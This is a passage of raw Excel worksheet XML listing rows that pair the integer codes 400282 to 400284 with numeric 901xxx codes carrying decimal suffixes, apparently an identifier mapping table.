        <v>901546.005</v>
      </c>
    </row>
    <row r="1266" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1266" s="6">
        <v>400282</v>
      </c>
      <c r="B1266" s="3">
        <v>901546.00600000005</v>
      </c>
    </row>
    <row r="1267" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1267" s="6">
        <v>400282</v>
      </c>
      <c r="B1267" s="3">
        <v>901546.00699999998</v>
      </c>
    </row>
    <row r="1268" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1268" s="6">
        <v>400282</v>
      </c>
      <c r="B1268" s="3">
        <v>901546.00800000003</v>
      </c>
    </row>
    <row r="1269" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1269" s="6">
        <v>400282</v>
      </c>
      <c r="B1269" s="3">
        <v>901546.00899999996</v>
      </c>
    </row>
    <row r="1270" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1270" s="6">
        <v>400282</v>
      </c>
      <c r="B1270" s="3">
        <v>901546.01</v>
      </c>
    </row>
    <row r="1271" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1271" s="6">
        <v>400282</v>
      </c>
      <c r="B1271" s="3">
        <v>901546.01100000006</v>
      </c>
    </row>
    <row r="1272" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1272" s="6">
        <v>400282</v>
      </c>
      <c r="B1272" s="3">
        <v>901546.01199999999</v>
      </c>
    </row>
    <row r="1273" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1273" s="6">
        <v>400282</v>
      </c>
      <c r="B1273" s="3">
        <v>901546.01300000004</v>
      </c>
    </row>
    <row r="1274" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1274" s="6">
        <v>400282</v>
      </c>
      <c r="B1274" s="3">
        <v>901546.01399999997</v>
      </c>
    </row>
    <row r="1275" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1275" s="6">
        <v>400282</v>
      </c>
      <c r="B1275" s="3">
        <v>901546.01500000001</v>
      </c>
    </row>
    <row r="1276" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1276" s="6">
        <v>400282</v>
      </c>
      <c r="B1276" s="3">
        <v>901480</v>
      </c>
    </row>
    <row r="1277" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1277" s="6">
        <v>400282</v>
      </c>
      <c r="B1277" s="3">
        <v>901480.00100000005</v>
      </c>
    </row>
    <row r="1278" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1278" s="6">
        <v>400282</v>
      </c>
      <c r="B1278" s="3">
        <v>901052</v>
      </c>
    </row>
    <row r="1279" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1279" s="6">
        <v>400282</v>
      </c>
      <c r="B1279" s="3">
        <v>901052.00100000005</v>
      </c>
    </row>
    <row r="1280" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1280" s="6">
        <v>400282</v>
      </c>
      <c r="B1280" s="3">
        <v>901083</v>
      </c>
    </row>
    <row r="1281" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1281" s="6">
        <v>400282</v>
      </c>
      <c r="B1281" s="3">
        <v>901222</v>
      </c>
    </row>
    <row r="1282" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1282" s="6">
        <v>400282</v>
      </c>
      <c r="B1282" s="3">
        <v>901222.00100000005</v>
      </c>
    </row>
    <row r="1283" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1283" s="6">
        <v>400282</v>
      </c>
      <c r="B1283" s="3">
        <v>901222.00199999998</v>
      </c>
    </row>
    <row r="1284" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1284" s="6">
        <v>400282</v>
      </c>
      <c r="B1284" s="3">
        <v>901615</v>
      </c>
    </row>
    <row r="1285" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1285" s="6">
        <v>400282</v>
      </c>
      <c r="B1285" s="3">
        <v>901564</v>
      </c>
    </row>
    <row r="1286" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1286" s="6">
        <v>400282</v>
      </c>
      <c r="B1286" s="3">
        <v>901564.00100000005</v>
      </c>
    </row>
    <row r="1287" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1287" s="6">
        <v>400282</v>
      </c>
      <c r="B1287" s="3">
        <v>901564.00199999998</v>
      </c>
    </row>
    <row r="1288" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1288" s="6">
        <v>400282</v>
      </c>
      <c r="B1288" s="3">
        <v>901564.00300000003</v>
      </c>
    </row>
    <row r="1289" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1289" s="6">
        <v>400282</v>
      </c>
      <c r="B1289" s="3">
        <v>901564.00600000005</v>
      </c>
    </row>
    <row r="1290" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1290" s="6">
        <v>400282</v>
      </c>
      <c r="B1290" s="3">
        <v>901564.00899999996</v>
      </c>
    </row>
    <row r="1291" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1291" s="6">
        <v>400282</v>
      </c>
      <c r="B1291" s="3">
        <v>901574</v>
      </c>
    </row>
    <row r="1292" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1292" s="6">
        <v>400282</v>
      </c>
      <c r="B1292" s="3">
        <v>901574.00199999998</v>
      </c>
    </row>
    <row r="1293" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1293" s="6">
        <v>400282</v>
      </c>
      <c r="B1293" s="3">
        <v>901574.005</v>
      </c>
    </row>
    <row r="1294" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1294" s="6">
        <v>400282</v>
      </c>
      <c r="B1294" s="3">
        <v>901574.00600000005</v>
      </c>
    </row>
    <row r="1295" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1295" s="6">
        <v>400282</v>
      </c>
      <c r="B1295" s="3">
        <v>901574.00699999998</v>
      </c>
    </row>
    <row r="1296" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1296" s="6">
        <v>400282</v>
      </c>
      <c r="B1296" s="3">
        <v>901574.00800000003</v>
      </c>
    </row>
    <row r="1297" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1297" s="6">
        <v>400282</v>
      </c>
      <c r="B1297" s="3">
        <v>901574.00899999996</v>
      </c>
    </row>
    <row r="1298" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1298" s="6">
        <v>400282</v>
      </c>
      <c r="B1298" s="3">
        <v>901574.01</v>
      </c>
    </row>
    <row r="1299" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1299" s="6">
        <v>400282</v>
      </c>
      <c r="B1299" s="3">
        <v>901574.01100000006</v>
      </c>
    </row>
    <row r="1300" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1300" s="6">
        <v>400282</v>
      </c>
      <c r="B1300" s="3">
        <v>901574.01199999999</v>
      </c>
    </row>
    <row r="1301" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1301" s="6">
        <v>400282</v>
      </c>
      <c r="B1301" s="3">
        <v>901562</v>
      </c>
    </row>
    <row r="1302" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1302" s="6">
        <v>400282</v>
      </c>
      <c r="B1302" s="3">
        <v>901562.00199999998</v>
      </c>
    </row>
    <row r="1303" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1303" s="6">
        <v>400282</v>
      </c>
      <c r="B1303" s="3">
        <v>901562.00899999996</v>
      </c>
    </row>
    <row r="1304" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1304" s="6">
        <v>400282</v>
      </c>
      <c r="B1304" s="3">
        <v>901562.01</v>
      </c>
    </row>
    <row r="1305" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1305" s="6">
        <v>400282</v>
      </c>
      <c r="B1305" s="3">
        <v>901070</v>
      </c>
    </row>
    <row r="1306" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1306" s="6">
        <v>400282</v>
      </c>
      <c r="B1306" s="3">
        <v>901070.005</v>
      </c>
    </row>
    <row r="1307" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1307" s="6">
        <v>400282</v>
      </c>
      <c r="B1307" s="3">
        <v>901202</v>
      </c>
    </row>
    <row r="1308" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1308" s="6">
        <v>400282</v>
      </c>
      <c r="B1308" s="3">
        <v>901490</v>
      </c>
    </row>
    <row r="1309" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1309" s="6">
        <v>400282</v>
      </c>
      <c r="B1309" s="3">
        <v>901056</v>
      </c>
    </row>
    <row r="1310" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1310" s="6">
        <v>400282</v>
      </c>
      <c r="B1310" s="3">
        <v>901056.00199999998</v>
      </c>
    </row>
    <row r="1311" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1311" s="6">
        <v>400282</v>
      </c>
      <c r="B1311" s="3">
        <v>901559</v>
      </c>
    </row>
    <row r="1312" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1312" s="6">
        <v>400282</v>
      </c>
      <c r="B1312" s="3">
        <v>901559.00100000005</v>
      </c>
    </row>
    <row r="1313" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1313" s="6">
        <v>400282</v>
      </c>
      <c r="B1313" s="3">
        <v>901559.00199999998</v>
      </c>
    </row>
    <row r="1314" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1314" s="6">
        <v>400282</v>
      </c>
      <c r="B1314" s="3">
        <v>901570</v>
      </c>
    </row>
    <row r="1315" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1315" s="6">
        <v>400282</v>
      </c>
      <c r="B1315" s="3">
        <v>901112</v>
      </c>
    </row>
    <row r="1316" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1316" s="6">
        <v>400282</v>
      </c>
      <c r="B1316" s="3">
        <v>901135</v>
      </c>
    </row>
    <row r="1317" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1317" s="6">
        <v>400282</v>
      </c>
      <c r="B1317" s="3">
        <v>901040</v>
      </c>
    </row>
    <row r="1318" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1318" s="6">
        <v>400282</v>
      </c>
      <c r="B1318" s="3">
        <v>901027</v>
      </c>
    </row>
    <row r="1319" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1319" s="6">
        <v>400282</v>
      </c>
      <c r="B1319" s="3">
        <v>901027.00399999996</v>
      </c>
    </row>
    <row r="1320" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1320" s="6">
        <v>400282</v>
      </c>
      <c r="B1320" s="3">
        <v>901137</v>
      </c>
    </row>
    <row r="1321" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1321" s="6">
        <v>400282</v>
      </c>
      <c r="B1321" s="3">
        <v>901137.00100000005</v>
      </c>
    </row>
    <row r="1322" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1322" s="6">
        <v>400282</v>
      </c>
      <c r="B1322" s="3">
        <v>901137.00199999998</v>
      </c>
    </row>
    <row r="1323" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1323" s="6">
        <v>400282</v>
      </c>
      <c r="B1323" s="3">
        <v>901137.00300000003</v>
      </c>
    </row>
    <row r="1324" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1324" s="6">
        <v>400282</v>
      </c>
      <c r="B1324" s="3">
        <v>901137.00399999996</v>
      </c>
    </row>
    <row r="1325" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1325" s="6">
        <v>400282</v>
      </c>
      <c r="B1325" s="3">
        <v>901137.005</v>
      </c>
    </row>
    <row r="1326" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1326" s="6">
        <v>400282</v>
      </c>
      <c r="B1326" s="3">
        <v>901137.00600000005</v>
      </c>
    </row>
    <row r="1327" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1327" s="6">
        <v>400282</v>
      </c>
      <c r="B1327" s="3">
        <v>901003</v>
      </c>
    </row>
    <row r="1328" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1328" s="6">
        <v>400282</v>
      </c>
      <c r="B1328" s="3">
        <v>901003.00100000005</v>
      </c>
    </row>
    <row r="1329" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1329" s="6">
        <v>400282</v>
      </c>
      <c r="B1329" s="3">
        <v>901201</v>
      </c>
    </row>
    <row r="1330" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1330" s="6">
        <v>400282</v>
      </c>
      <c r="B1330" s="3">
        <v>901120</v>
      </c>
    </row>
    <row r="1331" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1331" s="6">
        <v>400282</v>
      </c>
      <c r="B1331" s="3">
        <v>901069</v>
      </c>
    </row>
    <row r="1332" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1332" s="6">
        <v>400282</v>
      </c>
      <c r="B1332" s="3">
        <v>901069.00100000005</v>
      </c>
    </row>
    <row r="1333" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1333" s="6">
        <v>400282</v>
      </c>
      <c r="B1333" s="3">
        <v>901069.00199999998</v>
      </c>
    </row>
    <row r="1334" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1334" s="6">
        <v>400282</v>
      </c>
      <c r="B1334" s="3">
        <v>901069.00300000003</v>
      </c>
    </row>
    <row r="1335" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1335" s="6">
        <v>400282</v>
      </c>
      <c r="B1335" s="3">
        <v>901057</v>
      </c>
    </row>
    <row r="1336" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1336" s="6">
        <v>400282</v>
      </c>
      <c r="B1336" s="3">
        <v>901012</v>
      </c>
    </row>
    <row r="1337" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1337" s="6">
        <v>400282</v>
      </c>
      <c r="B1337" s="3">
        <v>901219</v>
      </c>
    </row>
    <row r="1338" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1338" s="6">
        <v>400282</v>
      </c>
      <c r="B1338" s="3">
        <v>901563</v>
      </c>
    </row>
    <row r="1339" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1339" s="6">
        <v>400282</v>
      </c>
      <c r="B1339" s="3">
        <v>901563.00100000005</v>
      </c>
    </row>
    <row r="1340" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1340" s="6">
        <v>400282</v>
      </c>
      <c r="B1340" s="3">
        <v>901563.00199999998</v>
      </c>
    </row>
    <row r="1341" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1341" s="6">
        <v>400282</v>
      </c>
      <c r="B1341" s="3">
        <v>901021</v>
      </c>
    </row>
    <row r="1342" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1342" s="6">
        <v>400282</v>
      </c>
      <c r="B1342" s="3">
        <v>901021.00100000005</v>
      </c>
    </row>
    <row r="1343" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1343" s="6">
        <v>400282</v>
      </c>
      <c r="B1343" s="3">
        <v>901021.00300000003</v>
      </c>
    </row>
    <row r="1344" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1344" s="6">
        <v>400282</v>
      </c>
      <c r="B1344" s="3">
        <v>901021.00399999996</v>
      </c>
    </row>
    <row r="1345" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1345" s="6">
        <v>400282</v>
      </c>
      <c r="B1345" s="3">
        <v>901021.005</v>
      </c>
    </row>
    <row r="1346" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1346" s="6">
        <v>400282</v>
      </c>
      <c r="B1346" s="3">
        <v>901021.00600000005</v>
      </c>
    </row>
    <row r="1347" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1347" s="6">
        <v>400282</v>
      </c>
      <c r="B1347" s="3">
        <v>901018</v>
      </c>
    </row>
    <row r="1348" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1348" s="6">
        <v>400282</v>
      </c>
      <c r="B1348" s="3">
        <v>901091</v>
      </c>
    </row>
    <row r="1349" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1349" s="6">
        <v>400282</v>
      </c>
      <c r="B1349" s="3">
        <v>901496</v>
      </c>
    </row>
    <row r="1350" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1350" s="6">
        <v>400282</v>
      </c>
      <c r="B1350" s="3">
        <v>901053</v>
      </c>
    </row>
    <row r="1351" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1351" s="6">
        <v>400282</v>
      </c>
      <c r="B1351" s="3">
        <v>901053.00100000005</v>
      </c>
    </row>
    <row r="1352" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1352" s="6">
        <v>400282</v>
      </c>
      <c r="B1352" s="3">
        <v>901053.00199999998</v>
      </c>
    </row>
    <row r="1353" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1353" s="6">
        <v>400282</v>
      </c>
      <c r="B1353" s="3">
        <v>901053.00300000003</v>
      </c>
    </row>
    <row r="1354" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1354" s="6">
        <v>400282</v>
      </c>
      <c r="B1354" s="3">
        <v>901053.005</v>
      </c>
    </row>
    <row r="1355" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1355" s="6">
        <v>400282</v>
      </c>
      <c r="B1355" s="3">
        <v>901053.00600000005</v>
      </c>
    </row>
    <row r="1356" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1356" s="6">
        <v>400282</v>
      </c>
      <c r="B1356" s="3">
        <v>901505</v>
      </c>
    </row>
    <row r="1357" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1357" s="6">
        <v>400282</v>
      </c>
      <c r="B1357" s="3">
        <v>901505.00300000003</v>
      </c>
    </row>
    <row r="1358" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1358" s="6">
        <v>400282</v>
      </c>
      <c r="B1358" s="3">
        <v>901489</v>
      </c>
    </row>
    <row r="1359" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1359" s="6">
        <v>400282</v>
      </c>
      <c r="B1359" s="3">
        <v>901218</v>
      </c>
    </row>
    <row r="1360" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1360" s="6">
        <v>400282</v>
      </c>
      <c r="B1360" s="3">
        <v>901218.00100000005</v>
      </c>
    </row>
    <row r="1361" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1361" s="6">
        <v>400282</v>
      </c>
      <c r="B1361" s="3">
        <v>901218.00199999998</v>
      </c>
    </row>
    <row r="1362" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1362" s="6">
        <v>400282</v>
      </c>
      <c r="B1362" s="3">
        <v>901218.00300000003</v>
      </c>
    </row>
    <row r="1363" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1363" s="6">
        <v>400282</v>
      </c>
      <c r="B1363" s="3">
        <v>901218.00399999996</v>
      </c>
    </row>
    <row r="1364" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1364" s="6">
        <v>400282</v>
      </c>
      <c r="B1364" s="3">
        <v>901218.005</v>
      </c>
    </row>
    <row r="1365" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1365" s="6">
        <v>400282</v>
      </c>
      <c r="B1365" s="3">
        <v>901218.00699999998</v>
      </c>
    </row>
    <row r="1366" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1366" s="6">
        <v>400282</v>
      </c>
      <c r="B1366" s="3">
        <v>901218.00800000003</v>
      </c>
    </row>
    <row r="1367" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1367" s="6">
        <v>400282</v>
      </c>
      <c r="B1367" s="3">
        <v>901218.00899999996</v>
      </c>
    </row>
    <row r="1368" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1368" s="6">
        <v>400282</v>
      </c>
      <c r="B1368" s="3">
        <v>901218.01</v>
      </c>
    </row>
    <row r="1369" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1369" s="6">
        <v>400282</v>
      </c>
      <c r="B1369" s="3">
        <v>901218.01100000006</v>
      </c>
    </row>
    <row r="1370" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1370" s="6">
        <v>400282</v>
      </c>
      <c r="B1370" s="3">
        <v>901218.01199999999</v>
      </c>
    </row>
    <row r="1371" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1371" s="6">
        <v>400282</v>
      </c>
      <c r="B1371" s="3">
        <v>901218.01300000004</v>
      </c>
    </row>
    <row r="1372" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1372" s="6">
        <v>400282</v>
      </c>
      <c r="B1372" s="3">
        <v>901218.01399999997</v>
      </c>
    </row>
    <row r="1373" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1373" s="6">
        <v>400282</v>
      </c>
      <c r="B1373" s="3">
        <v>901216</v>
      </c>
    </row>
    <row r="1374" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1374" s="6">
        <v>400282</v>
      </c>
      <c r="B1374" s="3">
        <v>901216.00100000005</v>
      </c>
    </row>
    <row r="1375" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1375" s="6">
        <v>400282</v>
      </c>
      <c r="B1375" s="3">
        <v>901072</v>
      </c>
    </row>
    <row r="1376" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1376" s="6">
        <v>400282</v>
      </c>
      <c r="B1376" s="3">
        <v>901518</v>
      </c>
    </row>
    <row r="1377" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1377" s="6">
        <v>400282</v>
      </c>
      <c r="B1377" s="3">
        <v>901518.00100000005</v>
      </c>
    </row>
    <row r="1378" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1378" s="6">
        <v>400282</v>
      </c>
      <c r="B1378" s="3">
        <v>901553</v>
      </c>
    </row>
    <row r="1379" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1379" s="6">
        <v>400282</v>
      </c>
      <c r="B1379" s="3">
        <v>901553.00100000005</v>
      </c>
    </row>
    <row r="1380" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1380" s="6">
        <v>400282</v>
      </c>
      <c r="B1380" s="3">
        <v>901553.00399999996</v>
      </c>
    </row>
    <row r="1381" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1381" s="6">
        <v>400282</v>
      </c>
      <c r="B1381" s="3">
        <v>901553.00600000005</v>
      </c>
    </row>
    <row r="1382" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1382" s="6">
        <v>400282</v>
      </c>
      <c r="B1382" s="3">
        <v>901082</v>
      </c>
    </row>
    <row r="1383" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1383" s="6">
        <v>400282</v>
      </c>
      <c r="B1383" s="3">
        <v>901614</v>
      </c>
    </row>
    <row r="1384" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1384" s="6">
        <v>400282</v>
      </c>
      <c r="B1384" s="3">
        <v>901614.00100000005</v>
      </c>
    </row>
    <row r="1385" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1385" s="6">
        <v>400282</v>
      </c>
      <c r="B1385" s="3">
        <v>901016</v>
      </c>
    </row>
    <row r="1386" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1386" s="6">
        <v>400282</v>
      </c>
      <c r="B1386" s="3">
        <v>901016.00100000005</v>
      </c>
    </row>
    <row r="1387" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1387" s="6">
        <v>400282</v>
      </c>
      <c r="B1387" s="3">
        <v>901049</v>
      </c>
    </row>
    <row r="1388" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1388" s="6">
        <v>400282</v>
      </c>
      <c r="B1388" s="3">
        <v>901033</v>
      </c>
    </row>
    <row r="1389" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1389" s="6">
        <v>400282</v>
      </c>
      <c r="B1389" s="3">
        <v>901007</v>
      </c>
    </row>
    <row r="1390" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1390" s="6">
        <v>400282</v>
      </c>
      <c r="B1390" s="3">
        <v>901569</v>
      </c>
    </row>
    <row r="1391" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1391" s="6">
        <v>400282</v>
      </c>
      <c r="B1391" s="3">
        <v>901569.00100000005</v>
      </c>
    </row>
    <row r="1392" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1392" s="6">
        <v>400282</v>
      </c>
      <c r="B1392" s="3">
        <v>901569.00199999998</v>
      </c>
    </row>
    <row r="1393" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1393" s="6">
        <v>400282</v>
      </c>
      <c r="B1393" s="3">
        <v>901529</v>
      </c>
    </row>
    <row r="1394" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1394" s="6">
        <v>400282</v>
      </c>
      <c r="B1394" s="3">
        <v>901124</v>
      </c>
    </row>
    <row r="1395" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1395" s="6">
        <v>400282</v>
      </c>
      <c r="B1395" s="3">
        <v>901080</v>
      </c>
    </row>
    <row r="1396" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1396" s="6">
        <v>400282</v>
      </c>
      <c r="B1396" s="3">
        <v>901221</v>
      </c>
    </row>
    <row r="1397" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1397" s="6">
        <v>400282</v>
      </c>
      <c r="B1397" s="3">
        <v>901127</v>
      </c>
    </row>
    <row r="1398" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1398" s="6">
        <v>400282</v>
      </c>
      <c r="B1398" s="3">
        <v>901127.00100000005</v>
      </c>
    </row>
    <row r="1399" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1399" s="6">
        <v>400282</v>
      </c>
      <c r="B1399" s="3">
        <v>901552</v>
      </c>
    </row>
    <row r="1400" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1400" s="6">
        <v>400282</v>
      </c>
      <c r="B1400" s="3">
        <v>901552.00199999998</v>
      </c>
    </row>
    <row r="1401" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1401" s="6">
        <v>400282</v>
      </c>
      <c r="B1401" s="3">
        <v>901204</v>
      </c>
    </row>
    <row r="1402" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1402" s="6">
        <v>400282</v>
      </c>
      <c r="B1402" s="3">
        <v>901204.00199999998</v>
      </c>
    </row>
    <row r="1403" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1403" s="6">
        <v>400282</v>
      </c>
      <c r="B1403" s="3">
        <v>901497</v>
      </c>
    </row>
    <row r="1404" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1404" s="6">
        <v>400282</v>
      </c>
      <c r="B1404" s="3">
        <v>901497.00100000005</v>
      </c>
    </row>
    <row r="1405" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1405" s="6">
        <v>400282</v>
      </c>
      <c r="B1405" s="3">
        <v>901497.00199999998</v>
      </c>
    </row>
    <row r="1406" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1406" s="6">
        <v>400282</v>
      </c>
      <c r="B1406" s="3">
        <v>901497.00300000003</v>
      </c>
    </row>
    <row r="1407" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1407" s="6">
        <v>400282</v>
      </c>
      <c r="B1407" s="3">
        <v>901047</v>
      </c>
    </row>
    <row r="1408" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1408" s="6">
        <v>400282</v>
      </c>
      <c r="B1408" s="3">
        <v>901220</v>
      </c>
    </row>
    <row r="1409" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1409" s="6">
        <v>400283</v>
      </c>
      <c r="B1409" s="3">
        <v>901548</v>
      </c>
    </row>
    <row r="1410" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1410" s="6">
        <v>400283</v>
      </c>
      <c r="B1410" s="3">
        <v>901548.00199999998</v>
      </c>
    </row>
    <row r="1411" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1411" s="6">
        <v>400283</v>
      </c>
      <c r="B1411" s="3">
        <v>901548.00300000003</v>
      </c>
    </row>
    <row r="1412" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1412" s="6">
        <v>400283</v>
      </c>
      <c r="B1412" s="3">
        <v>901134</v>
      </c>
    </row>
    <row r="1413" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1413" s="6">
        <v>400283</v>
      </c>
      <c r="B1413" s="3">
        <v>901134.00399999996</v>
      </c>
    </row>
    <row r="1414" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1414" s="6">
        <v>400283</v>
      </c>
      <c r="B1414" s="3">
        <v>901562.01</v>
      </c>
    </row>
    <row r="1415" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1415" s="6">
        <v>400283</v>
      </c>
      <c r="B1415" s="3">
        <v>901056</v>
      </c>
    </row>
    <row r="1416" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1416" s="6">
        <v>400283</v>
      </c>
      <c r="B1416" s="3">
        <v>901056.00399999996</v>
      </c>
    </row>
    <row r="1417" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1417" s="6">
        <v>400283</v>
      </c>
      <c r="B1417" s="3">
        <v>901036</v>
      </c>
    </row>
    <row r="1418" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1418" s="6">
        <v>400283</v>
      </c>
      <c r="B1418" s="3">
        <v>901036.00300000003</v>
      </c>
    </row>
    <row r="1419" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1419" s="6">
        <v>400283</v>
      </c>
      <c r="B1419" s="3">
        <v>901036.005</v>
      </c>
    </row>
    <row r="1420" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1420" s="6">
        <v>400284</v>
      </c>
